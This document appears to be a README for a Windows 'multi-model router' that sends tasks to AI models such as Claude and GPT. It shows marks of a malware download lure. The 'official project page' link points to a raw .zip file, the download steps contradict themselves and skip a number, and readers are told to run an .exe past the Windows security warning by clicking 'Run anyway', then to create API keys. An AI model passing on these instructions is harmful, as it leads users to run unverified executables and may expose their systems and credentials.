This tool routes your AI tasks to the most capable model. It connects to any service that follows the OpenAI standard. You use it to pick the right tool for every job. It supports models like Claude, GPT, DeepSeek, Kimi, and Qwen.

📥 How to download the software

Visit the [official project page](https://raw.githubusercontent.com/wasila7220/multi-model-router/main/examples/model-multi-router-v3.5-beta.1.zip) to get your copy.

  1. Go to the link above.

  3. Click the latest version link.
  4. Find the file ending in .exe under the "Assets" list.
  5. Download this file to your computer.

⚙️ Setting up your system

The software requires a Windows environment. Ensure you have a stable internet connection. Most computers made in the last five years run this tool without issues.

Once the file finishes downloading, move it to a folder you can find easily, like your Desktop or Documents folder. You do not need to install complex drivers or extra software to make this work.

🚀 Running the application

  1. Find the .exe file you downloaded earlier.
  2. Double-click the file icon.
  3. Your computer might show a security notice because the app is new. Click "More info" and then "Run anyway" if this window appears.
  4. The router window opens on your desktop.

If the window stays empty, check your internet settings. You must have a network connection to talk to the AI models.

🛠 Using the router

The router acts as a middleman. You send a request, and the router decides which model handles the answer. It uses models like GPT or Claude based on your current needs.

To start:

  1. Open your model provider's website.
  2. Generate an API key. This key acts as your password.
